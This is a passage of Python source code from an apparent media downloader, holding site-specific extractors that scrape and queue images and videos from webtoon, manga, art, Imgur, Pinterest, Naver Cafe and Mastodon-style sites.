cw=self.cw): if isinstance(img, Image): self.urls.append(img.url) else: self.urls.append(img) self.title = self.name def get_title(soup): a = soup.find('a', class_='tit') if a: return a.text.strip() return re.find(r'제목\s*:\s*(.+)', soup.find('a', class_='tit').text, err='no title') def get_artist(soup): return re.find(r'작가\s*:\s*(.+)', soup.text, default='').strip() or 'N/A' @try_n(4, sleep=60) def get_imgs_page(page, referer, session, cw=None): print_ = get_print(cw) sleep(5, cw) #2017 html = downloader.read_html(page.url, referer, session=session) inserted = re.find(r'''var\s*inserted\s*=\s*['"](.*?)['"]''', html) print_('inserted: {}'.format(inserted)) inserted = set(int(i) for i in inserted.split(',')) if inserted else set() soup = Soup(html) view = soup.find(class_='pdf-wrap') imgs = [] for i, img in enumerate(child for child in view.children if isinstance(child, bs4.element.Tag)): src = img.get('data-src') or img.get('src') or '' if i in inserted: print_('remove: {}'.format(src)) continue if not src: continue src = urljoin(page.url, src.strip()) if '/adimg/' in src: print('adimg:', src) continue if '/notice' in src: print('notice:', src) continue img = Image(src, page, len(imgs)) imgs.append(img) return imgs def get_pages(url, soup, session): pages = [] for inner in soup.findAll('div', class_='inner'): a = inner.find('a') if not a: continue href = a.attrs.get('href', '') if not re.search(PATTERN_ID, href): continue if a.find('img'): print('skip img', a.attrs.get('href')) continue href = urljoin(url, href) title_page = a.text page = Page(title_page, href) pages.append(page) pages = list(reversed(pages)) return pages @page_selector.register('jmana') def f(url, win): if re.search(PATTERN_ID, url): raise Exception(tr_('목록 주소를 입력해주세요')) session = Session() res = clf2.solve(url, session=session, win=win) #4070 soup = Soup(res['html']) pages = get_pages(url, soup, session) return pages def get_imgs(url, title, session, soup=None, cw=None): print_ = get_print(cw) if soup is None: html = downloader.read_html(url, session=session) soup = Soup(html) pages = get_pages(url, soup, session) print_('pages: {}'.format(len(pages))) pages = page_selector.filter(pages, cw) imgs = [] for i, page in enumerate(pages): check_alive(cw) imgs_already = get_imgs_already('jmana', title, page, cw) if imgs_already: imgs += imgs_already continue imgs += get_imgs_page(page, url, session, cw) if cw is not None: cw.setTitle('{} {} / {} ({} / {})'.format(tr_('읽는 중...'), title, page.title, i + 1, len(pages))) if not imgs: raise Exception('no imgs') return imgs File: src/extractor/navertoon_downloader.py import downloader from utils import Soup, urljoin, Downloader, get_imgs_already, clean_title, get_ext, get_print, errors, check_alive, File, try_n, json import ree as re import page_selector from translator import tr_ import utils class Page: def __init__(self, url, title, p): self.url = url self.title = title self.p = p class File_navertoon(File): type = 'navertoon' format = 'title/page:04;' def __init__(self, info): ext = get_ext(info['url']) d = { 'title': clean_title(info['title']), 'page': info['page'], 'chapterid': re.find(r'[?&]no=([0-9]+)', info['referer']), #6380 } info['name'] = utils.format('navertoon', d, ext) super().__init__(info) class Info: def __init__(self, id, title, artist): self.id = id self.title = title self.artist = artist class Downloader_navertoon(Downloader): type = 'navertoon' URLS = ['comic.naver.com'] MAX_CORE = 8 MAX_SPEED = 4.0 display_name = 'Naver Webtoon' ACCEPT_COOKIES = [r'(.*\.)?naver\.com'] def init(self): self.__info, _ = get_pages(self.url, self.cw) @classmethod def fix_url(cls, url): url = re.sub(r'[?&]page=[0-9]+', '', re.sub(r'[?&]no=[0-9]+', '', url)).replace('m.comic.naver.', 'comic.naver.') url = url.replace('detail.nhn', 'list.nhn').replace('/detail?', '/list?') return url.rstrip('#') @property def name(self): id = self.__info.id title = self.__info.title artist = self.__info.artist title = self.format_title('N/A', id, title, artist, 'N/A', 'N/A', 'Korean', prefix='navertoon_') return clean_title(title) def read(self): self.title = tr_('읽는 중... {}').format(self.name) imgs = get_imgs_all(self.url, self.name, cw=self.cw) for img in imgs: self.urls.append(img) self.title = self.name def set_no(url, p): if '&no=' not in url: url = url + f'&no={p}' return url url = re.sub('&no=[0-9]+', f'&no={p}', url) return url def get_id(url): return int(url.lower().split('titleid=')[1].split('&')[0]) def set_page(url, p): if '&page=' in url: url = re.sub('&page=[0-9]+', f'&page={p}', url) else: url += f'&page={p}' return url @try_n(4) def get_pages(url, cw=None): print_ = get_print(cw) url = Downloader_navertoon.fix_url(url).replace('comic.naver.', 'm.comic.naver.') id = get_id(url) print('id:', id) print(url) html = downloader.read_html(url) soup = Soup(html) if soup.find('button', class_='btn_check'): raise errors.LoginRequired() try: info = soup.find('div', class_='area_info') artist = info.find('span', class_='author').text.strip() except Exception as e: print(e) try: title = ('\n').join(soup.find('div', class_='title').text.strip().split('\n')[:-1]).strip() except: title = 'artist not found' raise Exception(title) print_('artist: {}'.format(artist)) title = soup.find('meta', {'property': 'og:title'}).attrs['content'] pages = [] nos = set() for p in range(1, 100): if p == 1: url_page = url else: url_page = set_page(url, p) html = downloader.read_html(url_page) print('read page:', url_page) soup = Soup(html) view = soup.findAll('ul', class_='section_episode_list')[(-1)] for lst in view.findAll('li'): url_page = urljoin(url, lst.find('a').attrs['href']) if 'detail.nhn' not in url_page.lower() and 'detail?' not in url_page.lower(): #3540 continue print_('url_page: {}'.format(url_page)) text = lst.find('strong', class_='title').find('span', class_='name').text.strip() no = int(re.findall('[?&]no=([0-9]+)', url_page)[0]) if no in nos: print('duplicate no: {}'.format(no)) continue nos.add(no) text = '{:04} - {}'.format(no, text) page = Page(url_page, text, p) pages.append(page) btn_next = soup.find('a', class_='btn_next') if btn_next is None or btn_next.attrs['href'] == '#': print('end of page') break info = Info(id, title, artist) return ( info, pages) @page_selector.register('navertoon') @try_n(4) def f(url): url = Downloader_navertoon.fix_url(url) info, pages = get_pages(url) return pages @try_n(6) def get_imgs(page, cw=None): print_ = get_print(cw) html = downloader.read_html(page.url) soup = Soup(html) type_ = re.find('''webtoonType *: *['"](.+?)['"]''', html) print_('type: {}'.format(type_)) imgs = [] if type_ == 'DEFAULT': # https://m.comic.naver.com/webtoon/detail.nhn?titleId=715772 view = soup.find('div', class_='toon_view_lst') for img in view.findAll('img'): img = img.attrs.get('data-src') if not img: continue img = urljoin(page.url, img) img = File_navertoon({'referer': page.url, 'url':img, 'title': page.title, 'page': len(imgs)}) imgs.append(img) elif type_ == 'CUTTOON': # https://m.comic.naver.com/webtoon/detail.nhn?titleId=752803 view = soup.find('div', class_='swiper-wrapper') for div in view.findAll('div', class_='swiper-slide'): if div.parent != view: continue if div.find('div', class_='cut_viewer_last'): print('cut_viewer_last') continue if div.find('div', class_='cut_viewer_recomm'): print('cut_viewer_recomm') continue img = div.find('img') img = img.attrs['data-src'] img = urljoin(page.url, img) img = File_navertoon({'referer': page.url, 'url':img, 'title': page.title, 'page': len(imgs)}) imgs.append(img) elif type_ == 'EFFECTTOON': #2313; https://m.comic.naver.com/webtoon/detail.nhn?titleId=670144 img_base = re.find('''imageUrl *: *['"](.+?)['"]''', html) + '/' print('img_base:', img_base) url_api = re.find('''documentUrl *: *['"](.+?)['"]''', html) data_raw = downloader.read_html(url_api, page.url) data = json.loads(data_raw) for img in data['assets']['stillcut'].values(): # ordered in python3.7+ img = urljoin(img_base, img) img = File_navertoon({'referer': page.url, 'url':img, 'title': page.title, 'page': len(imgs)}) imgs.append(img) else: _imgs = re.findall('sImageUrl *: *[\'"](.+?)[\'"]', html) if not _imgs: raise Exception('no imgs') for img in _imgs: img = urljoin(page.url, img) img = File_navertoon({'referer': page.url, 'url':img, 'title': page.title, 'page': len(imgs)}) imgs.append(img) return imgs def get_imgs_all(url, title, cw=None): print_ = get_print(cw) info, pages = get_pages(url, cw) pages = page_selector.filter(pages, cw) imgs = [] for p, page in enumerate(pages): check_alive(cw) imgs_already = get_imgs_already('navertoon', title, page, cw) if imgs_already: imgs += imgs_already continue imgs_new = get_imgs(page, cw) print_('{}: {}'.format(page.title, len(imgs_new))) imgs += imgs_new if cw is not None: cw.setTitle(tr_('읽는 중... {} / {} ({}/{})').format(title, page.title, p + 1, len(pages))) return imgs File: src/extractor/yandere_downloader.py from utils import Downloader, urljoin, clean_title, try_n, check_alive, LazyUrl, get_ext, get_max_range, limits from translator import tr_ import ree as re import downloader from urllib.parse import unquote @try_n(4) @limits(.25) def read_soup(url): return downloader.read_soup(url) class Downloader_yandere(Downloader): type = 'yande.re' URLS = ['yande.re'] MAX_CORE = 4 ACCEPT_COOKIES = [r'(.*\.)?yande\.re'] @classmethod def fix_url(cls, url): url = re.sub(r'([?&])page=[0-9]+&?', r'\1', url).rstrip('?&') pool = re.find('/pool/show/([0-9]+)', url) if pool is not None: url = urljoin(url, '/post?tags=pool%3A{}'.format(pool)) return url def read(self): title = self.get_title(self.url) url = self.url n = get_max_range(self.cw) ids = set() while True: check_alive(self.cw) soup = read_soup(url) for a in soup.find_all('a', class_='thumb'): id_ = re.find(r'/show/([0-9]+)', a['href'], err='no id') if id_ in ids: self.print_(f'dup: {id_}') continue ids.add(id_) img = Image(urljoin(url, a['href']), id_) self.urls.append(img.url) if len(self.urls) >= n: del self.urls[n:] break self.cw.setTitle('{} {} - {}'.format(tr_('읽는 중...'), title, len(self.urls))) next_page = soup.find('a', attrs={'rel':'next'}, href=True) if not next_page: break else: url = urljoin(self.url, next_page['href']) self.title = title def get_id(self, url:str) -> str: id_ = url.split('yande.re%20')[1].split('%20')[0] return int(id_) def get_title(self, url:str) -> str: if "tags=" not in url: raise NotImplementedError('no tags') url_tags = url.split("tags=")[-1].split('+') return clean_title(unquote(" ".join(url_tags))) class Image: def __init__(self, url, id_): self._id = id_ self.url = LazyUrl(url, self.get, self) def get(self, url): soup = read_soup(url) img = soup.find('a', class_='original-file-unchanged') or soup.find('a', class_='original-file-changed') img = urljoin(url, img['href']) ext = get_ext(img) self.filename = clean_title(self._id, n=-len(ext)) + ext return img File: src/extractor/imgur_downloader.py import downloader from utils import Downloader, Soup, try_n, urljoin, get_max_range, clean_title, cut_pair, check_alive, json import ree as re import os from translator import tr_ class Downloader_imgur(Downloader): type = 'imgur' URLS = ['imgur.com'] MAX_CORE = 16 ACCEPT_COOKIES = [r'(.*\.)?imgur\.com'] def init(self): self.info = get_info(self.url) @property def id_(self): return re.find('imgur.com/.+?/([0-9a-zA-Z]+)', self.url) @property def name(self): title = self.info['title'] or 'N/A' return clean_title(title, n=100) def read(self): imgs = get_imgs(self.url, self.info, self.cw) for img in imgs: ext = os.path.splitext(img.split('?')[0])[1] if len(imgs) > 1: self.filenames[img] = '{:04}{}'.format(len(self.urls), ext) else: self.filenames[img] = clean_title(self.name, n=-len(ext)) + ext self.urls.append(img) self.single = len(imgs) == 1 self.referer = self.url self.title = '{} (imgur_{})'.format(self.name, self.id_) @try_n(4) def get_info(url): url = url.replace('/gallery/', '/a/') if '/r/' in url and url.split('/r/')[1].strip('/').count('/') == 0: title = re.find(r'/r/([^/]+)', url) info = {} info['title'] = title info['type'] = 'r' else: try: # legacy html = downloader.read_html(url, cookies={'over18':'1'}) s = re.find('image *: *({.+)', html) info_raw = cut_pair(s) except Exception as e: # new print(e) id_ = re.find(r'/a/([0-9a-zA-Z_]+)', url) or re.find(r'/r/[0-9a-zA-Z_]+/([0-9a-zA-Z_]+)', url, err='no id') url_api = 'https://api.imgur.com/post/v1/albums/{}?client_id=546c25a59c58ad7&include=media%2Cadconfig%2Caccount'.format(id_) info_raw = downloader.read_html(url_api, cookies={'over18':'1'}) info = json.loads(info_raw) info['type'] = 'a' return info def get_imgs(url, info=None, cw=None): print('get_imgs', url) if info is None: info = get_info(url) imgs = [] # Range max_pid = get_max_range(cw) if info['type'] == 'a': if 'album_images' in info: # legacy imgs_ = info['album_images']['images'] elif 'media' in info: # new imgs_ = info['media'] else: # legacy imgs_ = [info] for img in imgs_: img_url = img.get('url') # new if not img_url: # legacy hash = img['hash'] ext = img['ext'] img_url = 'https://i.imgur.com/{}{}'.format(hash, ext) if img_url in imgs: continue imgs.append(img_url) elif info['type'] == 'r': urls = set() for p in range(100): url_api = 'https://imgur.com/r/{}/new/page/{}/hit?scrolled'.format(info['title'], p) print(url_api) html = downloader.read_html(url_api, referer=url) soup = Soup(html) c = 0 for post in soup.findAll('div', class_='post'): check_alive(cw) a = post.find('a', class_='image-list-link') url_post = urljoin(url, a.attrs['href']) if url_post in urls: continue urls.add(url_post) c += 1 try: # for r18 images imgs += get_imgs(url_post) except Exception as e: print(e) s = '{} {} ({})'.format(tr_('읽는 중...'), info['title'], len(imgs)) if cw is not None: cw.setTitle(s) else: print(s) if c == 0: print('same; break') break if len(imgs) >= max_pid: break return imgs File: src/extractor/navercafe_downloader.py #coding:utf8 from utils import Downloader, get_print, urljoin, Soup, get_ext, File, clean_title, downloader, re, try_n, errors, json, Session import utils class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://nid.naver.com/nidlogin.login') class Downloader_navercafe(Downloader): type = 'navercafe' URLS = ['cafe.naver.com'] display_name = 'Naver Cafes' ACCEPT_COOKIES = [r'(.*\.)?naver\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): m = re.find(r'cafe\.naver\.com/([^/?#]+).+?articleid%3D([0-9]+)', url) if m: url = 'https://cafe.naver.com/{}/{}'.format(*m) return url def read(self): info = get_info(self.url, self.session, self.cw) for img in info['imgs']: self.urls.append(img) tail = f' ({info["cafename"]}_{info["id"]})' self.title = clean_title(info['title'], n=-len(tail)) + tail @try_n(4) def get_info(url, session, cw=None): print_ = get_print(cw) info = {} html = downloader.read_html(url, 'http://search.naver.com', session=session) soup = Soup(html) if '"cafe_cautionpage"' in html: raise LoginRequired() url_article = re.find(r'''//cafe\.naver\.com/ArticleRead\.nhn\?articleid=[0-9]+[^'"]*''', html, err='no articleid') url_article = urljoin(url, url_article) print_(url_article) articleid = re.find(r'articleid=([0-9]+)', url_article) clubid = re.find(r'clubid(=|%3D)([0-9]+)', url_article)[1] art = re.find(r'art=(.+?)&', url_article) if art: url_api = f'https://apis.naver.com/cafe-web/cafe-articleapi/v2.1/cafes/{clubid}/articles/{articleid}?art={art}&useCafeId=true&requestFrom=A' else: url_api = f'https://apis.naver.com/cafe-web/cafe-articleapi/v2.1/cafes/{clubid}/articles/{articleid}?query=&useCafeId=true&requestFrom=A' j = downloader.read_json(url_api, url_article, session=session) if j['result'].get('errorCode'): #6358 raise LoginRequired(j['result'].get('reason')) info['title'] = j['result']['article']['subject'] info['cafename'] = j['result']['cafe']['url'] info['cafeid'] = clubid info['id'] = articleid html_content = j['result']['article']['contentHtml'] soup = Soup(html_content) imgs = [] pairs = [] for video in soup.findAll('span', class_='_naverVideo'): vid = video.attrs['vid'] key = video.attrs['key'] pairs.append((vid, key)) for script in soup.findAll('script', class_='__se_module_data'): data_raw = script['data-module'] data = json.loads(data_raw)['data'] vid = data.get('vid') if not vid: continue key = data['inkey'] pairs.append((vid, key)) for vid, key in pairs: url_api = f'https://apis.naver.com/rmcnmv/rmcnmv/vod/play/v2.0/{vid}?key={key}' data_raw = downloader.read_html(url_api) data = json.loads(data_raw) fs = data['videos']['list'] fs = sorted(fs, key=lambda f: f['size'], reverse=True) video = Image({'url': fs[0]['source'], 'referer': url_article, 'p': len(imgs)}) imgs.append(video) for img in soup.findAll('img'): img = Image({'url': urljoin(url_article, img['src']), 'referer': url, 'p': len(imgs)}) imgs.append(img) info['imgs'] = imgs return info class Image(File): type = 'navercafe' format = 'page:04;' def __init__(self, info): self._url = info['url'] info['url'] = re.sub(r'[?&]type=[wh0-9]+', '', self._url) #6460 ext = get_ext(info['url']) d = { 'page': info['p'], } info['name'] = utils.format('navercafe', d, ext) super().__init__(info) def alter(self): return self._url File: src/extractor/hf_downloader.py #coding:utf8 import downloader from utils import Soup, urljoin, Session, LazyUrl, Downloader, try_n, clean_title, check_alive import ree as re import os from translator import tr_ URL_ENTER = 'https://www.hentai-foundry.com/site/index?enterAgree=1&size=1550' URL_FILTER = 'https://www.hentai-foundry.com/site/filters' class Image: def __init__(self, url, session): @try_n(4) def f(_): html = downloader.read_html(url, session=session) soup = Soup(html) box = soup.find('section', id='picBox') img = box.find('img') if img is None: raise Exception('No img') onclick = img.attrs.get('onclick', '') if onclick and '.src' in onclick: print('onclick', onclick) img = re.find('''.src *= *['"](.+?)['"]''', onclick) else: img = img.attrs['src'] img = urljoin(url, img) filename = clean_title(os.path.basename(img.split('?')[0])) name, ext = os.path.splitext(filename) # https://www.hentai-foundry.com/pictures/user/DrGraevling/74069/Eversong-Interrogation-pg.-13 if ext.lower() not in ['.bmp', '.png', '.gif', '.jpg', '.jpeg', '.webp', '.webm', '.avi', '.mp4', '.mkv', '.wmv']: filename = '{}.jpg'.format(name) self.filename = filename return img self.url = LazyUrl(url, f, self) def get_username(url): if 'user/' in url: username = url.split('user/')[1].split('?')[0].split('/')[0] return username class Downloader_hf(Downloader): type = 'hf' URLS = ['hentai-foundry.com'] MAX_CORE = 16 display_name = 'Hentai Foundry' ACCEPT_COOKIES = [r'(.*\.)?hentai-foundry\.com'] def init(self): self.session = enter() @classmethod def fix_url(cls, url): username = get_username(url) return 'https://www.hentai-foundry.com/user/{}'.format(username) def read(self): username = get_username(self.url) self.title = username imgs = get_imgs(username, self.title, self.session, cw=self.cw) for img in imgs: self.urls.append(img.url) self.title = username @try_n(2) def enter(): print('enter') session = Session() r = session.get(URL_ENTER) # 862 html = r.text soup = Soup(html) box = soup.find('aside', id='FilterBox') data = {} for select in box.findAll('select'): name = select.attrs['name'] value = select.findAll('option')[-1].attrs['value'] print(name, value) data[name] = value for input in box.findAll('input'): name = input.attrs['name'] value = input.attrs['value'] if name.startswith('rating_') or 'CSRF_TOKEN' in name: print(name, value) data[name] = value data.update({ 'filter_media': 'A', 'filter_order': 'date_new', 'filter_type': '0', }) r = session.post(URL_FILTER, data=data, headers={'Referer': r.url}) print(r) return session def get_imgs(username, title, session, cw=None): url = 'https://www.hentai-foundry.com/pictures/user/{}'.format(username) #downloader.read_html(url_enter, session=session) hrefs = [] for p in range(100): check_alive(cw) print(url) html = downloader.read_html(url, session=session) soup = Soup(html) if soup.find('div', id='entryButtonContainer'): session = enter() continue tab = soup.find('a', class_='active') n = re.find(r'\(([0-9]+)', tab.text) view = soup.find('div', class_='galleryViewTable') for a in view.findAll('a', class_='thumbLink'): href = urljoin(url, a.attrs['href']) if href in hrefs: print('dup') continue hrefs.append(href) next = soup.find(lambda tag: tag.name == 'li' and tag.get('class') == ['next']) if next is None: break url = urljoin(url, next.a.attrs['href']) s = '{} {} ({} / {})'.format(tr_('읽는 중...'), title, len(hrefs), n) if cw: cw.setTitle(s) else: print(s) imgs = [] for href in hrefs: img = Image(href, session) imgs.append(img) return imgs File: src/extractor/file_downloader.py import downloader, os from utils import Downloader, query_url, clean_title, get_ext, Session from hashlib import md5 class Downloader_file(Downloader): type = 'file' single = True URLS = [] def init(self): self.session = Session() #6525 @classmethod def fix_url(cls, url): if url and '://' not in url: url = 'https://' + url.lstrip('/') return url def read(self): if not self.url.strip(): raise Exception('empty url') qs = query_url(self.url) for key in qs: if key.lower() in ('file', 'filename'): name = qs[key][(-1)] break else: name = self.url for esc in ['?', '#']: name = name.split(esc)[0] name = os.path.basename(name.strip('/')) try: ext = downloader.get_ext(self.url) except: ext = '' if not ext: ext = get_ext(name) name = os.path.splitext(name)[0] self.urls.append(self.url) id_ = md5(self.url.encode('utf8')).hexdigest()[:8] tail = ' ({}){}'.format(id_, ext) filename = clean_title(name, n=-len(tail)) + tail self.filenames[self.url] = filename self.title = filename File: src/extractor/wikiart_downloader.py #coding:utf8 import downloader from utils import LazyUrl, Downloader, Session, get_print, clean_title, check_alive, json import os from translator import tr_ class Image: def __init__(self, url, referer, title, id): self.url = LazyUrl(referer, lambda _: url, self) ext = os.path.splitext(url.split('?')[0])[1] n = len(id) + len(ext) + 3 title = clean_title(title, n=-n) self.filename = '{} - {}{}'.format(id, title, ext) class Downloader_wikiart(Downloader): type = 'wikiart' URLS = ['wikiart.org'] display_name = 'WikiArt' ACCEPT_COOKIES = [r'(.*\.)?wikiart\.org'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): url = 'https://www.wikiart.org/en/{}'.format(get_id(url)) return url def read(self): artist = get_artist(get_id(self.url), self.session) self.artist = artist for img in get_imgs(self.url, artist, self.session, cw=self.cw): self.urls.append(img.url) self.title = clean_title(artist) def get_id(url): userid = url.split('?')[0].split('#')[0].split('wikiart.org/')[1].split('/')[1] return userid def get_imgs(url, artist, session, cw=None): print_ = get_print(cw) userid = get_id(url) print(userid) imgs = [] ids = set() for p in range(1, 100): check_alive(cw) url_api = 'https://www.wikiart.org/en/{}/mode/all-paintings?json=2&layout=new&page={}&resultType=masonry'.format(userid, p) print(url_api) data_raw = downloader.read_html(url_api, url, session=session) data = json.loads(data_raw) _imgs = data['Paintings'] n = data['AllPaintingsCount'] if not _imgs: print_('???') break for p in _imgs: img = p['image'] id = p['id'] referer = p['paintingUrl'] title = p['title'] if id in ids: print('duplicate: {}'.format(id)) continue ids.add(id) img = Image(img, referer, title, id) imgs.append(img) s = '{} {} - {} / {}'.format(tr_('읽는 중...'), artist, len(imgs), n) if cw: cw.setTitle(s) else: print(s) if len(imgs) == n: print_('full') break return imgs def get_artist(userid, session): url = 'https://www.wikiart.org/en/{}'.format(userid) soup = downloader.read_soup(url, session=session) return soup.find('h3').text.strip() File: src/extractor/pinter_downloader.py from utils import Session, Downloader, LazyUrl, clean_url, try_n, clean_title, get_ext, get_max_range, check_alive, limits, json import ree as re from translator import tr_ import urllib from m3u8_tools import playlist2stream, M3u8_stream BASE_URL = 'https://www.pinterest.com' class Downloader_pinter(Downloader): type = 'pinter' URLS = ['pinterest.'] type_pinter = 'board' display_name = 'Pinterest' ACCEPT_COOKIES = [r'(.*\.)?(pinterest)\.'] @try_n(4) def init(self): self.session = Session('chrome') self.api = PinterestAPI(self.session) self._pin_id = re.find(r'https?://.*pinterest\.[^/]+/pin/([0-9]+)', self.url) if self._pin_id is not None: self.type_pinter = 'pin' else: username, board = get_username_board(self.url) if '/' in board: self.type_pinter = 'section' if board == '_created': self.type_pinter = 'created' self.print_(f'type: {self.type_pinter}') if self.type_pinter in ['board', 'section', 'created']: self.info = get_info(username, board, self.api) elif self.type_pinter == 'pin': pass #5132 else: raise NotImplementedError(self.type_pinter) @classmethod def fix_url(cls, url): if 'pinterest.' not in url: url = f'https://www.pinterest.com/{url}' return url @property def name(self): if self.type_pinter == 'pin': return self._pin_id username = '' name = '' if self.type_pinter == 'created': username = self.info['native_creator']['username'] name = '_created' else: username = self.info['owner']['username'] name = self.info['name'] return clean_title(f'{username}/{name}') def read(self): if self.type_pinter == 'pin': self.single = True id = self._pin_id else: id = self.info['id'] self.title = self.name imgs = get_imgs(id, self.api, cw=self.cw, title=self.name, type=self.type_pinter) for img in imgs: self.urls.append(img.url) self.title = self.name def get_info(username, board, api): if '/' in board: section = '/'.join(board.split('/')[1:]) board = board.split('/')[0] info = api.board(username, board) for s in api.board_sections(info['id']): print(s['slug'].lower(), section) if s['slug'].lower() == section.lower(): break else: raise Exception('Invalid section') title = s['title'] info.update(s) info['name'] = f'{info["name"]}/{title}' print('section_id:', info['id']) elif board == '_created': info = api.board_created(username)[0] else: info = api.board(username, board) return info class PinterestAPI: HEADERS = { 'Accept': 'application/json, text/javascript, */*, q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Referer': BASE_URL + '/', 'X-Requested-With': 'XMLHttpRequest', 'X-APP-VERSION' : '31461e0', 'X-Pinterest-AppState': 'active', 'Origin': BASE_URL, } def __init__(self, session): self.session = session self.session.headers.update(self.HEADERS) def pin(self, pin_id): options = {'id': pin_id, 'field_set_key': 'detailed'} return self._call('Pin', options)['resource_response']['data'] def pin_related(self, pin_id): options = {'pin': pin_id, 'add_vase': True, 'pins_only': True} return self._pagination('RelatedPinFeed', options) def board(self, user, board): options = {'slug': board, 'username': user, 'field_set_key': 'detailed'} return self._call('Board', options)['resource_response']['data'] def board_pins(self, board_id): options = {'board_id': board_id} return self._pagination('BoardFeed', options) def board_related(self, board_id): options = {'board_id': board_id, 'add_vase': True} return self._pagination('BoardRelatedPixieFeed', options) def board_sections(self, board_id): options = {'board_id': board_id} return self._pagination('BoardSections', options) def board_section_pins(self, section_id): options = {'section_id': section_id} return self._pagination('BoardSectionPins', options) def board_created(self, user): options = {'data': {}, 'username': user, 'field_set_key': 'grid_item'} return self._call('UserActivityPins', options)['resource_response']['data'] def board_created_pins(self, user): options = {'data': {}, 'username': user, 'field_set_key': 'grid_item'} return self._pagination('UserActivityPins', options) @try_n(4) @limits(4) # 1000 calls per hour def _call(self, resource, options): url = f'{BASE_URL}/resource/{resource}Resource/get/' params = {'data': json.dumps({'options': options}), 'source_url': ''} #print(f'_call: {url}, {params}') r = self.session.get(url, params=params) s = r.text status_code = r.status_code try: data = json.loads(s) except ValueError: data = {} if status_code < 400 and not r.history: return data if status_code == 404 or r.history: raise Exception('Not Found') raise Exception(f'API request failed: {status_code}') def _pagination(self, resource, options): while True: data = self._call(resource, options) if resource == 'UserActivityPins' and len(data['resource_response']['data']) == 0: return for x in data['resource_response']['data']: yield x try: bookmarks = data['resource']['options']['bookmarks'] if not bookmarks or bookmarks[0] == '-end-' or bookmarks[0].startswith('Y2JOb25lO'): return options['bookmarks'] = bookmarks except KeyError: return class Image: def __init__(self, img): self.id = img['id'] print(self.id) videos = img.get('videos') if videos and 'video_list' in videos: src = list(videos['video_list'].values())[0]['url'] else: src = img['images']['orig']['url'] ext = get_ext(src) if ext.lower() == '.m3u8': try: src = playlist2stream(src) except: src = M3u8_stream(src) ext = '.mp4' self.url = LazyUrl(f'{BASE_URL}/pin/{self.id}/', lambda _: src, self) self.filename = f'{self.id}{ext}' def get_imgs(id, api, cw=None, title=None, type='board'): n = get_max_range(cw) imgs = [] ids = set() print(f'get_imgs: type={type}') if type == 'board': gen = api.board_pins(id) elif type == 'section': gen = api.board_section_pins(id) elif type == 'pin': gen = [api.pin(id)] elif type == 'created': gen = api.board_created_pins(title.split('/')[0]) else: raise Exception(f'Type "{type}" is not supported') for img in gen: check_alive(cw) if 'images' not in img: print('skip img:', img['id']) continue img = Image(img) if type == 'pin' and img.id != id: raise AssertionError('id mismatch') if img.id in ids: print('duplicate:', img.id) continue ids.add(img.id) print(img.url) print(img.filename) print() imgs.append(img) if len(imgs) >= n: break if cw is not None: cw.setTitle('{} {} ({})'.format(tr_('읽는 중...'), title, len(imgs))) return imgs def get_username_board(url): url = clean_url(url) m = re.search('pinterest.[a-zA-Z.]+?/([^/]+)/([^#\\?]+)', url) username, board = m.groups() board = urllib.parse.unquote(board).strip() while board.endswith('/'): board = board[:-1].strip() return (username, board) File: src/extractor/pawoo_downloader.py #coding:utf8 from utils import Downloader, clean_title, Session, Soup, urljoin import clf2 from mastodon import get_info import ree as re def get_id(url): return re.find('pawoo.net/([^/]+)', url.lower()) class Downloader_pawoo(Downloader): type = 'pawoo' URLS = ['pawoo.net'] ACCEPT_COOKIES = [r'(.*\.)?pawoo\.net'] def init(self): self.session = Session() if get_id(self.url) == 'web': #6123 soup = Soup(clf2.solve(self.url)['html']) name = soup.find('div', class_='account__header__tabs__name') id_ = name.find('small').text.strip() self.url = urljoin(self.url, f'/{id_}') @classmethod def fix_url(cls, url): if url.endswith('/media'): url = url[:-len('/media')] id_ = get_id(url) or url if id_ == 'web': return url return f'https://pawoo.net/{id_}' def read(self): id_ = get_id(self.url) info = get_info('pawoo.net', id_, f'pawoo_{id_}', self.session, self.cw) self.urls += info['files'] self.title = clean_title('{} (pawoo_{})'.format(info['title'], id_)) File: src/extractor/manatoki_downloader.py from utils import Soup, try_n, Downloader, urljoin, get_print, Session, clean_title, get_ext, fix_title, lazy, get_imgs_already, check_alive, File, limits from translator import tr_ import page_selector import utils import clf2 import ree as re from PIL import Image class File_manatoki(File): type = 'manatoki' format = 'title/page:04;' show_pp = False def __init__(self, info): ext = get_ext(info['url']) if ext.lower()[1:] not in ['jpg', 'jpeg', 'bmp', 'png', 'gif', 'webm', 'webp']: ext = '.jpg' d = { 'title': info['title'], 'page': info['page'], 'chapterid': re.find(r'/comic/([0-9]+)', info['referer']), #6380 } info['name'] = utils.format('manatoki', d, ext) super().__init__(info) @limits(.5) def get(self): return {} def pp(self, filename): #5233 img = Image.open(filename) nf = getattr(img, 'n_frames', 1) loop = img.info.get('loop') if nf > 1 and loop: img.seek(nf-1) img.save(filename) img.close() return filename class Page: def __init__(self, title, url): self.title = clean_title(title) self.url = url self.id = int(re.find(r'/(comic|webtoon)/([0-9]+)', url, err='no id')[1]) class Downloader_manatoki(Downloader): type = 'manatoki' URLS = [r'regex:(mana|new)toki[0-9]*\.(com|net)'] MAX_CORE = 4 ACCEPT_COOKIES = [r'(.*\.)?(mana|new)toki[0-9]*\.(com|net)'] @try_n(2) def init(self): self.session, self.soup, url = get_soup(self.url, cw=self.cw) self.url = self.fix_url(url) # 2377 list = self.soup.find(attrs={'data-original-title': '목록'}) if list: url = urljoin(self.url, list.parent['href']) nav = self.soup.find('div', class_='toon-nav') select = nav.find('select', {'name': 'wr_id'}) for i, op in enumerate(select.findAll('option')[::-1]): if 'selected' in op.attrs: break else: raise Exception('no selected option') self.session, self.soup, url = get_soup(url, cw=self.cw) url_page = self.fix_url(url) for i, page in enumerate(get_pages(url_page, self.soup)): if page.id == int(op['value']): break else: raise Exception('can not find page') self.cw.range_p = [i] self.url = url_page self.name @classmethod def fix_url(cls, url): # 2377 m = re.find(r'/board.php\?bo_table=([0-9a-zA-Z_]+)&wr_id=([0-9]+)', url) if m: return urljoin(url, '/{}/{}'.format(*m)) return url.split('?')[0] @classmethod def key_id(cls, url): return '/'.join(url.split('/')[3:5]) @lazy def name(self): artist = get_artist(self.soup) title = self.soup.find('meta', {'name':'subject'})['content'].strip() return fix_title(self, title, artist) def read(self): self.title = tr_('읽는 중... {}').format(self.name) self.artist = get_artist(self.soup) imgs = get_imgs(self.url, self.name, self.soup, self.session, self.cw) for img in imgs: 